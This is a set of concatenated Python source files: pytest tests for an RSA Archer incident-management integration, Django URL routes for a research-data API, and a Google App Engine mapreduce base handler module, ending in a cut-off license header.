assert incident['name'] == 'RSA Archer Incident: 227602'
assert incident['occurred'] == '2018-03-26T10:03:00Z'
def test_search_records(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.post(BASE_URL + 'ws/general.asmx', text=GET_TOKEN_SOAP)
requests_mock.get(BASE_URL + 'api/core/system/level/module/1', json=GET_LEVEL_RES)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/level/123', json=FIELD_DEFINITION_RES)
requests_mock.post(BASE_URL + 'ws/search.asmx', text=SEARCH_RECORDS_RES)
client = Client(BASE_URL, '', '', '', '', 400)
records, raw_res = client.search_records(1, ['External Links', 'Device Name'])
assert raw_res
assert len(records) == 1
assert records[0]['record']['Id'] == '238756'
assert records[0]['record']['Device Name'] == 'DEVICE NAME'
@pytest.mark.parametrize('field_name,field_to_search_by_id,expected_condition', [
('id_field_name', '', '<TextFilterCondition> <Operator>Contains</Operator> '
+ '<Field name="id_field_name">field_id</Field> <Value>1234</Value></TextFilterCondition >'),
('id_field_name', 'id_field_name', '<ContentFilterCondition> <Level>5678</Level> '
+ '<Operator>Equals</Operator> <Values><Value>1234</Value></Values></ContentFilterCondition>')
])
def test_search_records_soap_request(self, field_name, field_to_search_by_id, expected_condition):
"""
Given:
            - Fields to search on records, and an ID field to search by ID.
When:
- Running search_records_soap_request to build the XML body.
Then:
            - Ensure the correct condition exists in the XML request body.
"""
xml_request = search_records_soap_request('token', 'app_id', 'display_fields', 'field_id',
field_name, '1234', field_to_search_by_id=field_to_search_by_id,
level_id='5678')
assert expected_condition in xml_request
def test_get_field_value_list(self, requests_mock):
cache = demisto.getIntegrationContext()
cache['fieldValueList'] = {}
demisto.setIntegrationContext(cache)
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/304', json=GET_FIElD_DEFINITION_RES)
requests_mock.get(BASE_URL + 'api/core/system/valueslistvalue/valueslist/62', json=VALUE_LIST_RES)
client = Client(BASE_URL, '', '', '', '', 400)
field_data = client.get_field_value_list(304)
assert VALUE_LIST_FIELD_DATA == field_data
def test_generate_field_value_text_input(self):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 1}, "Demisto")
assert field_key == 'Value'
assert field_value == 'Demisto'
def test_generate_field_value_values_list_input(self, requests_mock):
cache = demisto.getIntegrationContext()
cache['fieldValueList'] = {}
demisto.setIntegrationContext(cache)
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/304', json=GET_FIElD_DEFINITION_RES)
requests_mock.get(BASE_URL + 'api/core/system/valueslistvalue/valueslist/62', json=VALUE_LIST_RES)
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 4, 'FieldId': 304}, ["High"])
assert field_key == 'Value'
assert field_value == {'ValuesListIds': [473]}
def test_generate_field_external_link_input(self):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 7},
[{"value": "github", "link": "https://github.com"},
{"value": "google", "link": "https://google.com"}])
assert field_key == 'Value'
assert field_value == [{"Name": "github", "URL": "https://github.com"},
{"Name": "google", "URL": "https://google.com"}]
def test_generate_field_users_groups_input(self):
"""
Given:
            A valid dictionary value under the "fieldsToValues" argument
When:
- running archer-update-record
Then:
- assert fields are generated correctly
"""
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 8}, {"users": [20], "groups": [30]})
assert field_key == 'Value'
assert field_value == {"UserList": [{"ID": 20}], "GroupList": [{"ID": 30}]}
def test_generate_invalid_field_users_groups_input(self):
"""
Given:
            An invalid value under the "fieldsToValues" argument for a type 8 field (users/groups lists)
        When:
            - running archer-update-record
        Then:
            - Raise an exception indicating that the value is not in the right format
"""
client = Client(BASE_URL, '', '', '', '', 400)
with pytest.raises(DemistoException) as e:
generate_field_value(client, "test", {'Type': 8}, 'user1, user2')
assert "The value of the field: test must be a dictionary type and include a list under \"users\" key or " \
"\"groups\" key e.g: {\"Policy Owner\":{\"users\":[20],\"groups\":[30]}}" in str(e.value)
@pytest.mark.parametrize('field_value, result', [
([1, 2], [{"ContentID": 1}, {"ContentID": 2}]),
(1234, [{"ContentID": 1234}])
])
def test_generate_field_cross_reference_input(self, field_value, result):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 9}, field_value)
assert field_key == 'Value'
assert field_value == result
def test_generate_field_ip_address_input(self):
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "", {'Type': 19}, '127.0.0.1')
assert field_key == 'IpAddressBytes'
assert field_value == '127.0.0.1'
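    # Summary of the Archer field types exercised by the generate_field_value
    # tests above (derived from these tests only; not an exhaustive mapping):
    #   Type 1  -> text            -> plain string under 'Value'
    #   Type 4  -> values list     -> {'ValuesListIds': [...]} under 'Value'
    #   Type 7  -> external links  -> [{'Name': ..., 'URL': ...}] under 'Value'
    #   Type 8  -> users/groups    -> {'UserList': [...], 'GroupList': [...]} under 'Value'
    #   Type 9  -> cross reference -> [{'ContentID': ...}] under 'Value'
    #   Type 19 -> IP address      -> string under 'IpAddressBytes'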
def test_generate_field_value(self, requests_mock):
"""
Given
- generate_field_value on Values List type
When
- the source is not a list
Then
- ensure generate_field_value will handle it
"""
cache = demisto.getIntegrationContext()
cache['fieldValueList'] = {}
demisto.setIntegrationContext(cache)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/16172', json=GET_FIElD_DEFINITION_RES)
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': 'yes'})
requests_mock.get(BASE_URL + 'api/core/system/valueslistvalue/valueslist/62', json=VALUE_LIST_RES_FOR_SOURCE)
client = Client(BASE_URL, '', '', '', '', 400)
field_key, field_value = generate_field_value(client, "Source",
{'FieldId': '16172', 'IsRequired': False, 'Name':
'Source', 'RelatedValuesListId': 2092, 'Type': 4}, 'ArcSight')
assert field_key == 'Value'
assert field_value == {'ValuesListIds': [471]}
def test_record_to_incident_europe_time(self):
"""
Given:
            a record with European time (day first)
        When:
            fetching incidents
        Then:
            assert the returned dates are correct
"""
client = Client(BASE_URL, '', '', '', '', 400)
incident = INCIDENT_RECORD.copy()
incident['raw']['Field'][1]['@xmlConvertedValue'] = '2018-03-26T10:03:00Z'
incident['record']['Date/Time Reported'] = "26/03/2018 10:03 AM"
incident, incident_created_time = client.record_to_incident(INCIDENT_RECORD, 75, '305')
assert incident_created_time == datetime(2018, 3, 26, 10, 3, tzinfo=timezone.utc)
assert incident['occurred'] == '2018-03-26T10:03:00Z'
def test_record_to_incident_american_time(self):
"""
Given:
            a record with American time (month first)
        When:
            fetching incidents
        Then:
            assert the returned dates are correct
"""
client = Client(BASE_URL, '', '', '', '', 400)
incident = INCIDENT_RECORD.copy()
incident['record']['Date/Time Reported'] = '03/26/2018 10:03 AM'
incident['raw']['Field'][1]['@xmlConvertedValue'] = '2018-03-26T10:03:00Z'
incident, incident_created_time = client.record_to_incident(
INCIDENT_RECORD, 75, '305'
)
assert incident_created_time == datetime(2018, 3, 26, 10, 3, tzinfo=timezone.utc)
assert incident['occurred'] == '2018-03-26T10:03:00Z'
def test_fetch_time_change(self, mocker):
"""
Given:
            an incident with a date/time reported
            European time (day first) - True or False
        When:
            Fetching incidents
        Then:
            Check that the new next fetch is greater than last_fetch
            Check that next_fetch equals the expected date
Assert occurred time
"""
client = Client(BASE_URL, '', '', '', '', 400)
date_time_reported = '2018-04-03T10:03:00.000Z'
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record = copy.deepcopy(INCIDENT_RECORD)
record['record']['Date/Time Reported'] = date_time_reported
record['raw']['Field'][1]['@xmlConvertedValue'] = date_time_reported
last_fetch = get_fetch_time(
{'last_fetch': '2018-03-01T10:03:00Z'}, params.get('fetch_time', '3 days')
)
mocker.patch.object(client, 'search_records', return_value=([record], {}))
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch < next_fetch
assert next_fetch == datetime(2018, 4, 3, 10, 3, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == date_time_reported
def test_two_fetches(self, mocker):
"""
Given:
            2 incidents with a date/time reported
            running two fetches.
        When:
            Fetching incidents
        Then:
            Check that the new next fetch is greater than last_fetch on both calls.
            Check that next_fetch equals the date in the incident in both calls.
Assert occurred time
"""
client = Client(BASE_URL, '', '', '', '', 400)
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record1, record2 = copy.deepcopy(INCIDENT_RECORD), copy.deepcopy(INCIDENT_RECORD)
record1['record']['Date/Time Reported'] = '18/03/2020 10:30 AM'
record2['record']['Date/Time Reported'] = '18/03/2020 03:30 PM'
record1['raw']['Field'][1]['@xmlConvertedValue'] = '2020-03-18T10:30:00.000Z'
record2['raw']['Field'][1]['@xmlConvertedValue'] = '2020-03-18T15:30:00.000Z'
last_fetch = parser('2020-18-03T09:00:00Z')
mocker.patch.object(
client, 'search_records', side_effect=[
([record1], {}),
([record2], {})
]
)
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch < next_fetch
assert next_fetch == datetime(2020, 3, 18, 10, 30, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == '2020-03-18T10:30:00.000Z'
incidents, next_fetch = fetch_incidents(client, params, next_fetch, '305')
assert last_fetch < next_fetch
assert next_fetch == datetime(2020, 3, 18, 15, 30, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == '2020-03-18T15:30:00.000Z'
def test_fetch_got_old_incident(self, mocker):
"""
Given:
            last_fetch is newer than the new incident
        When:
            Fetching incidents
        Then:
            Check that the next fetch equals the last fetch (no new incident)
            Check that no incidents are brought back
"""
client = Client(BASE_URL, '', '', '', '', 400)
date_time_reported = '2018-03-01T10:02:00.000Z'
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record = copy.deepcopy(INCIDENT_RECORD)
record['record']['Date/Time Reported'] = date_time_reported
record['raw']['Field'][1]['@xmlConvertedValue'] = date_time_reported
last_fetch = get_fetch_time(
{'last_fetch': '2018-03-01T10:03:00Z'}, params.get('fetch_time', '3 days')
)
mocker.patch.object(client, 'search_records', return_value=([record], {}))
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch == next_fetch
assert not incidents, 'Should not get new incidents.'
def test_fetch_got_exact_same_time(self, mocker):
"""
Given:
            last_fetch is at the exact same time as the incident
        When:
            Fetching incidents
        Then:
            Check that the next fetch equals the last fetch (no new incident)
            Check that no incidents are brought back
"""
client = Client(BASE_URL, '', '', '', '', 400)
date_time_reported = '2018-03-01T10:02:00.000Z'
params = {
'applicationId': '75',
'applicationDateField': 'Date/Time Reported'
}
record = copy.deepcopy(INCIDENT_RECORD)
record['record']['Date/Time Reported'] = date_time_reported
record['raw']['Field'][1]['@xmlConvertedValue'] = date_time_reported
last_fetch = get_fetch_time(
{'last_fetch': date_time_reported}, params.get('fetch_time', '3 days')
)
mocker.patch.object(client, 'search_records', return_value=([record], {}))
incidents, next_fetch = fetch_incidents(client, params, last_fetch, '305')
assert last_fetch == next_fetch
assert not incidents, 'Should not get new incidents.'
def test_same_record_returned_in_two_fetches(self, mocker):
"""
Given:
- Same record returned in 2 fetch queries
When:
- Fetching incidents (2 iterations)
Then:
            Check that the new next fetch is greater than last_fetch on the first call.
            Check that the same record is not fetched again on the second call.
Assert occurred time
"""
client = Client(BASE_URL, '', '', '', '', 400)
mocker.patch.object(
client, 'search_records', side_effect=[
([INCIDENT_RECORD_US_TZ], {}),
([INCIDENT_RECORD_US_TZ], {})
]
)
params = {
'applicationId': '75',
'applicationDateField': 'created date'
}
field_time_id = '53075'
first_fetch = parser('2021-02-24T08:45:55Z')
incidents, first_next_fetch = fetch_incidents(client, params, first_fetch, field_time_id)
assert first_fetch < first_next_fetch
assert first_next_fetch == datetime(2021, 2, 25, 8, 45, 55, 977000, tzinfo=timezone.utc)
assert incidents[0]['occurred'] == '2021-02-25T08:45:55.977Z'
# first_next_fetch_dt simulates the set to last_run done in fetch-incidents
first_next_fetch_dt = parser(first_next_fetch.strftime(OCCURRED_FORMAT))
incidents, second_next_fetch = fetch_incidents(client, params, first_next_fetch_dt, field_time_id)
assert first_next_fetch == datetime(2021, 2, 25, 8, 45, 55, 977000, tzinfo=timezone.utc)
assert not incidents
def test_search_records_by_report_command(self, mocker):
"""
Given:
- search_records_by_report_command command args
When:
- run search_records_by_report_command
Then:
            - Verify the response outputs
            - Verify the response readable output
"""
mock_args = {'reportGuid': 'id'}
client = Client(BASE_URL, '', '', '', '', 400)
mocker.patch.object(client, 'do_soap_request',
return_value=[SEARCH_RECORDS_BY_REPORT_RES, SEARCH_RECORDS_BY_REPORT_RES])
mocker.patch.object(client, 'do_request', return_value=GET_LEVEL_RES_2)
mocker.patch.object(demisto, 'results')
search_records_by_report_command(client, mock_args)
assert demisto.results.call_args_list[0][0][0]['HumanReadable'] == MOCK_READABLE_SEARCH_RECORDS_BY_REPORT
assert demisto.results.call_args_list[0][0][0]['Contents'] == MOCK_RESULTS_SEARCH_RECORDS_BY_REPORT
|
|
from django.conf.urls import url
from .views import (
research_nitrogen_applied_views,
nitrogen_applied_views,
research_measurement_year_views,
measurement_duration_views,
measurement_season_views,
measurement_year_views,
research_diversity_views,
diversity_views,
research_experiment_description_views,
experiment_description_views,
research_experiment_replicate_views,
experiment_replicate_views,
research_author_views,
journal_views,
author_views,
experiment_unit_views,
research_experiment_unit_views,
breed_views,
experiment_unit_category_views,
research_views,
)
# Research nitrogen applied URLs
urlpatterns = [
url(
r'^researchnitrogenapplied/$',
research_nitrogen_applied_views['ResearchNitrogenAppliedListAPIView'].as_view(),
name='research_nitrogen_applied_list'
),
url(
r'^researchnitrogenapplied/create/$',
research_nitrogen_applied_views['ResearchNitrogenAppliedCreateAPIView'].as_view(),
name='research_nitrogen_applied_create'
),
url(
r'^researchnitrogenapplied/(?P<pk>[\w-]+)/$',
research_nitrogen_applied_views['ResearchNitrogenAppliedDetailAPIView'].as_view(),
name='research_nitrogen_applied_detail'
),
]
# Nitrogen applied URLs
urlpatterns += [
url(
r'^nitrogenapplied/$',
nitrogen_applied_views['NitrogenAppliedListAPIView'].as_view(),
name='nitrogen_applied_list'
),
url(
r'^nitrogenapplied/create/$',
nitrogen_applied_views['NitrogenAppliedCreateAPIView'].as_view(),
name='nitrogen_applied_create'
),
url(
r'^nitrogenapplied/(?P<pk>[\w-]+)/$',
nitrogen_applied_views['NitrogenAppliedDetailAPIView'].as_view(),
name='nitrogen_applied_detail'
),
]
# Research measurement year URLs
urlpatterns += [
url(
r'^researchmeasurementyear/$',
research_measurement_year_views['ResearchMeasurementYearListAPIView'].as_view(),
name='research_measurement_year_list'
),
url(
r'^researchmeasurementyear/create/$',
research_measurement_year_views['ResearchMeasurementYearCreateAPIView'].as_view(),
name='research_measurement_year_create'
),
url(
r'^researchmeasurementyear/(?P<pk>[\w-]+)/$',
research_measurement_year_views['ResearchMeasurementYearDetailAPIView'].as_view(),
name='research_measurement_year_detail'
),
]
# Measurement duration URLs
urlpatterns += [
url(
r'^measurementduration/$',
measurement_duration_views['MeasurementDurationListAPIView'].as_view(),
name='measurement_duration_list'
),
url(
r'^measurementduration/create/$',
measurement_duration_views['MeasurementDurationCreateAPIView'].as_view(),
name='measurement_duration_create'
),
url(
r'^measurementduration/(?P<pk>[\w-]+)/$',
measurement_duration_views['MeasurementDurationDetailAPIView'].as_view(),
name='measurement_duration_detail'
),
]
# Measurement season URLs
urlpatterns += [
url(
r'^measurementseason/$',
measurement_season_views['MeasurementSeasonListAPIView'].as_view(),
name='measurement_season_list'
),
url(
r'^measurementseason/create/$',
measurement_season_views['MeasurementSeasonCreateAPIView'].as_view(),
name='measurement_season_create'
),
url(
r'^measurementseason/(?P<slug>[\w-]+)/$',
measurement_season_views['MeasurementSeasonDetailAPIView'].as_view(),
name='measurement_season_detail'
),
]
# Measurement year URLs
urlpatterns += [
url(
r'^measurementyear/$',
measurement_year_views['MeasurementYearListAPIView'].as_view(),
name='measurement_year_list'
),
url(
r'^measurementyear/create/$',
measurement_year_views['MeasurementYearCreateAPIView'].as_view(),
name='measurement_year_create'
),
url(
r'^measurementyear/(?P<slug>[\w-]+)/$',
measurement_year_views['MeasurementYearDetailAPIView'].as_view(),
name='measurement_year_detail'
),
]
# Research diversity URLs
urlpatterns += [
url(
r'^researchdiversity/$',
research_diversity_views['ResearchDiversityListAPIView'].as_view(),
name='research_diversity_list'
),
url(
r'^researchdiversity/create/$',
research_diversity_views['ResearchDiversityCreateAPIView'].as_view(),
name='research_diversity_create'
),
url(
r'^researchdiversity/(?P<pk>[\w-]+)/$',
research_diversity_views['ResearchDiversityDetailAPIView'].as_view(),
name='research_diversity_detail'
),
]
# Diversity URLs
urlpatterns += [
url(
r'^diversity/$',
diversity_views['DiversityListAPIView'].as_view(),
name='diversity_list'
),
url(
r'^diversity/create/$',
diversity_views['DiversityCreateAPIView'].as_view(),
name='diversity_create'
),
url(
r'^diversity/(?P<slug>[\w-]+)/$',
diversity_views['DiversityDetailAPIView'].as_view(),
name='diversity_detail'
),
]
# Research experiment description URLs
urlpatterns += [
url(
r'^researchexperimentdescription/$',
research_experiment_description_views['ResearchExperimentDescriptionListAPIView'].as_view(),
name='research_experiment_description_list'
),
url(
r'^researchexperimentdescription/create/$',
research_experiment_description_views['ResearchExperimentDescriptionCreateAPIView'].as_view(),
name='research_experiment_description_create'
),
url(
r'^researchexperimentdescription/(?P<pk>[\w-]+)/$',
research_experiment_description_views['ResearchExperimentDescriptionDetailAPIView'].as_view(),
name='research_experiment_description_detail'
),
]
# Experiment description URLs
urlpatterns += [
url(
r'^experimentdescription/$',
experiment_description_views['ExperimentDescriptionListAPIView'].as_view(),
name='experiment_description_list'
),
url(
r'^experimentdescription/create/$',
experiment_description_views['ExperimentDescriptionCreateAPIView'].as_view(),
name='experiment_description_create'
),
url(
r'^experimentdescription/(?P<slug>[\w-]+)/$',
experiment_description_views['ExperimentDescriptionDetailAPIView'].as_view(),
name='experiment_description_detail'
),
]
# Research experiment replicate URLs
urlpatterns += [
url(
r'^researchexperimentreplicate/$',
research_experiment_replicate_views['ResearchExperimentReplicateListAPIView'].as_view(),
name='research_experiment_replicate_list'
),
url(
r'^researchexperimentreplicate/create/$',
research_experiment_replicate_views['ResearchExperimentReplicateCreateAPIView'].as_view(),
name='research_experiment_replicate_create'
),
url(
r'^researchexperimentreplicate/(?P<pk>[\w-]+)/$',
research_experiment_replicate_views['ResearchExperimentReplicateDetailAPIView'].as_view(),
name='research_experiment_replicate_detail'
),
]
# Experiment replicate URLs
urlpatterns += [
url(
r'^experimentreplicate/$',
experiment_replicate_views['ExperimentReplicateListAPIView'].as_view(),
name='experiment_replicate_list'
),
url(
r'^experimentreplicate/create/$',
experiment_replicate_views['ExperimentReplicateCreateAPIView'].as_view(),
name='experiment_replicate_create'
),
url(
r'^experimentreplicate/(?P<pk>[\w-]+)/$',
experiment_replicate_views['ExperimentReplicateDetailAPIView'].as_view(),
name='experiment_replicate_detail'
),
]
# Research author URLs
urlpatterns += [
url(
r'^researchauthor/$',
research_author_views['ResearchAuthorListAPIView'].as_view(),
name='research_author_list'
),
url(
r'^researchauthor/create/$',
research_author_views['ResearchAuthorCreateAPIView'].as_view(),
name='research_author_create'
),
url(
r'^researchauthor/(?P<pk>[\w-]+)/$',
research_author_views['ResearchAuthorDetailAPIView'].as_view(),
name='research_author_detail'
),
]
# Journal URLs
urlpatterns += [
url(
r'^journal/$',
journal_views['JournalListAPIView'].as_view(),
name='journal_list'
),
url(
r'^journal/create/$',
journal_views['JournalCreateAPIView'].as_view(),
name='journal_create'
),
url(
r'^journal/(?P<slug>[\w-]+)/$',
journal_views['JournalDetailAPIView'].as_view(),
name='journal_detail'
),
]
# Author URLs
urlpatterns += [
url(
r'^author/$',
author_views['AuthorListAPIView'].as_view(),
name='author_list'
),
url(
r'^author/create/$',
author_views['AuthorCreateAPIView'].as_view(),
name='author_create'
),
url(
r'^author/(?P<slug>[\w-]+)/$',
author_views['AuthorDetailAPIView'].as_view(),
name='author_detail'
),
]
# Experiment unit category URLs
urlpatterns += [
url(
r'^experimentunitcategory/$',
experiment_unit_category_views['ExperimentUnitCategoryListAPIView'].as_view(),
name='experiment_unit_category_list'
),
url(
r'^experimentunitcategory/create/$',
experiment_unit_category_views['ExperimentUnitCategoryCreateAPIView'].as_view(),
name='experiment_unit_category_create'
),
url(
r'^experimentunitcategory/(?P<slug>[\w-]+)/$',
experiment_unit_category_views['ExperimentUnitCategoryDetailAPIView'].as_view(),
name='experiment_unit_category_detail'
),
]
# Research experiment unit URLs
urlpatterns += [
url(
r'^researchexperimentunit/$',
research_experiment_unit_views['ResearchExperimentUnitListAPIView'].as_view(),
name='research_experiment_unit_list'
),
url(
r'^researchexperimentunit/create/$',
research_experiment_unit_views['ResearchExperimentUnitCreateAPIView'].as_view(),
name='research_experiment_unit_create'
),
url(
r'^researchexperimentunit/(?P<pk>[\w-]+)/$',
research_experiment_unit_views['ResearchExperimentUnitDetailAPIView'].as_view(),
name='research_experiment_unit_detail'
),
]
# Breed URLs
urlpatterns += [
url(
r'^breed/$',
breed_views['BreedListAPIView'].as_view(),
name='breed_list'
),
url(
r'^breed/create/$',
breed_views['BreedCreateAPIView'].as_view(),
name='breed_create'
),
url(
r'^breed/(?P<slug>[\w-]+)/$',
breed_views['BreedDetailAPIView'].as_view(),
name='breed_detail'
),
]
# Experiment unit URLs
urlpatterns += [
url(
r'^experimentunit/$',
experiment_unit_views['ExperimentUnitListAPIView'].as_view(),
name='experiment_unit_list'
),
url(
r'^experimentunit/create/$',
experiment_unit_views['ExperimentUnitCreateAPIView'].as_view(),
name='experiment_unit_create'
),
url(
r'^experimentunit/(?P<slug>[\w-]+)/$',
experiment_unit_views['ExperimentUnitDetailAPIView'].as_view(),
name='experiment_unit_detail'
),
]
# Research URLs
urlpatterns += [
url(r'^$', research_views['ResearchListAPIView'].as_view(), name='research_list'),
url(r'^create/$', research_views['ResearchCreateAPIView'].as_view(), name='research_create'),
url(r'^(?P<pk>[\w-]+)/$', research_views['ResearchDetailAPIView'].as_view(), name='research_detail'),
]
|
|
#!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base handler class for all mapreduce handlers."""
# pylint: disable=protected-access
# pylint: disable=g-bad-name
# pylint: disable=g-import-not-at-top
import httplib
import logging
from mapreduce.lib import simplejson
try:
from mapreduce import pipeline_base
except ImportError:
pipeline_base = None
try:
import cloudstorage
except ImportError:
cloudstorage = None
from google.appengine.ext import webapp
from mapreduce import errors
from mapreduce import model
from mapreduce import parameters
class Error(Exception):
"""Base-class for exceptions in this module."""
class BadRequestPathError(Error):
"""The request path for the handler is invalid."""
class BaseHandler(webapp.RequestHandler):
"""Base class for all mapreduce handlers.
In Python27 runtime, webapp2 will automatically replace webapp.
"""
def base_path(self):
"""Base path for all mapreduce-related urls."""
path = self.request.path
return path[:path.rfind("/")]
class TaskQueueHandler(BaseHandler):
"""Base class for handlers intended to be run only from the task queue.
Sub-classes should implement
  1. the 'handle' method for all POST requests.
  2. the '_preprocess' method for decoding or validation before handle.
  3. the '_drop_gracefully' method if _preprocess fails and the task has to
     be dropped.
"""
def __init__(self, *args, **kwargs):
# webapp framework invokes initialize after __init__.
# webapp2 framework invokes initialize within __init__.
    # Python27 runtime swaps webapp with webapp2 underneath us.
# Since initialize will conditionally change this field,
# it needs to be set before calling super's __init__.
self._preprocess_success = False
super(TaskQueueHandler, self).__init__(*args, **kwargs)
if cloudstorage:
cloudstorage.set_default_retry_params(
cloudstorage.RetryParams(save_access_token=True))
def initialize(self, request, response):
"""Initialize.
1. call webapp init.
2. check request is indeed from taskqueue.
3. check the task has not been retried too many times.
4. run handler specific processing logic.
    5. run error handling logic if processing failed.
Args:
request: a webapp.Request instance.
response: a webapp.Response instance.
"""
super(TaskQueueHandler, self).initialize(request, response)
# Check request is from taskqueue.
if "X-AppEngine-QueueName" not in self.request.headers:
logging.error(self.request.headers)
logging.error("Task queue handler received non-task queue request")
self.response.set_status(
403, message="Task queue handler received non-task queue request")
return
# Check task has not been retried too many times.
if self.task_retry_count() > parameters._MAX_TASK_RETRIES:
logging.error(
"Task %s has been retried %s times. Dropping it permanently.",
self.request.headers["X-AppEngine-TaskName"], self.task_retry_count())
self._drop_gracefully()
return
try:
self._preprocess()
self._preprocess_success = True
# pylint: disable=bare-except
except:
self._preprocess_success = False
logging.error(
"Preprocess task %s failed. Dropping it permanently.",
self.request.headers["X-AppEngine-TaskName"])
self._drop_gracefully()
def post(self):
if self._preprocess_success:
self.handle()
def handle(self):
"""To be implemented by subclasses."""
raise NotImplementedError()
def _preprocess(self):
"""Preprocess.
This method is called after webapp initialization code has been run
successfully. It can thus access self.request, self.response and so on.
"""
pass
def _drop_gracefully(self):
"""Drop task gracefully.
When preprocess failed, this method is called before the task is dropped.
"""
pass
def task_retry_count(self):
"""Number of times this task has been retried."""
return int(self.request.headers.get("X-AppEngine-TaskExecutionCount", 0))
def retry_task(self):
"""Ask taskqueue to retry this task.
Even though raising an exception can cause a task retry, it
    will flood logs with highly visible ERROR logs. Handlers should use
    this method to perform controlled task retries. Only raise exceptions
    for errors that deserve ERROR log entries.
"""
self.response.set_status(httplib.SERVICE_UNAVAILABLE, "Retry task")
self.response.clear()
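# Illustrative sketch (not part of the original module): a hypothetical
# TaskQueueHandler subclass wiring up the contract described above; the
# class name and payload key are assumptions for demonstration only.
class _ExampleCountHandler(TaskQueueHandler):
  """Hypothetical handler demonstrating the TaskQueueHandler contract."""
  def _preprocess(self):
    # Decode/validate the request before handle() is allowed to run.
    self.shard_id = self.request.get("shard_id")
    if not self.shard_id:
      raise Error("Missing shard_id parameter")
  def handle(self):
    # Reached only when _preprocess succeeded and retries are not exhausted.
    logging.info("Processing shard %s", self.shard_id)
  def _drop_gracefully(self):
    # Invoked when _preprocess raised or the task was retried too many times.
    logging.warning("Dropping task without raising an exception")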
class JsonHandler(BaseHandler):
"""Base class for JSON handlers for user interface.
Sub-classes should implement the 'handle' method. They should put their
response data in the 'self.json_response' dictionary. Any exceptions raised
by the sub-class implementation will be sent in a JSON response with the
name of the error_class and the error_message.
"""
def __init__(self, *args):
"""Initializer."""
    super(JsonHandler, self).__init__(*args)
self.json_response = {}
def base_path(self):
"""Base path for all mapreduce-related urls.
JSON handlers are mapped to /base_path/command/command_name thus they
require special treatment.
"""
path = self.request.path
base_path = path[:path.rfind("/")]
if not base_path.endswith("/command"):
raise BadRequestPathError(
"Json handlers should have /command path prefix")
return base_path[:base_path.rfind("/")]
def _handle_wrapper(self):
if self.request.headers.get("X-Requested-With") != "XMLHttpRequest":
logging.error("Got JSON request with no X-Requested-With header")
self.response.set_status(
403, message="Got JSON request with no X-Requested-With header")
return
self.json_response.clear()
try:
self.handle()
except errors.MissingYamlError:
logging.debug("Could not find 'mapreduce.yaml' file.")
self.json_response.clear()
self.json_response["error_class"] = "Notice"
self.json_response["error_message"] = "Could not find 'mapreduce.yaml'"
except Exception, e:
logging.exception("Error in JsonHandler, returning exception.")
# TODO(user): Include full traceback here for the end-user.
self.json_response.clear()
self.json_response["error_class"] = e.__class__.__name__
self.json_response["error_message"] = str(e)
self.response.headers["Content-Type"] = "text/javascript"
try:
output = simplejson.dumps(self.json_response, cls=model.JsonEncoder)
except:
logging.exception("Could not serialize to JSON")
self.response.set_status(500, message="Could not serialize to JSON")
return
else:
self.response.out.write(output)
def handle(self):
"""To be implemented by sub-classes."""
raise NotImplementedError()
class PostJsonHandler(JsonHandler):
"""JSON handler that accepts POST requests."""
def post(self):
self._handle_wrapper()
class GetJsonHandler(JsonHandler):
"""JSON handler that accepts GET posts."""
def get(self):
self._handle_wrapper()
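# Illustrative sketch (not part of the original module): a hypothetical
# handler following the JsonHandler contract described above; the class
# name and payload are assumptions for demonstration only.
class _ExampleStatusHandler(GetJsonHandler):
  """Hypothetical GET handler; _handle_wrapper serializes json_response."""
  def handle(self):
    # Populate self.json_response; exceptions raised here are converted into
    # an error_class/error_message JSON payload by _handle_wrapper.
    self.json_response["status"] = "ok"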
class HugeTaskHandler(TaskQueueHandler):
"""Base handler for processing HugeTasks."""
class _RequestWrapper(object):
def __init__(self, request):
self._request = request
self._params = model.HugeTask.decode_payload(request)
def get(self, name, default=""):
return self._params.get(name, default)
def set(self, name, value):
self._params[name] = value
def __getattr__(self, name):
return getattr(self._request, name)
def __init__(self, *args, **kwargs):
super(HugeTaskHandler, self).__init__(*args, **kwargs)
def _preprocess(self):
self.request = self._RequestWrapper(self.request)
if pipeline_base:
  # For backward compatibility.
PipelineBase = pipeline_base.PipelineBase
else:
PipelineBase = None
|
|
# Copyright 2012 majgis Contributors
#
# Individuals comprising majgis Contributors are identified in
# the NOTICE file found in the root directory of this project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
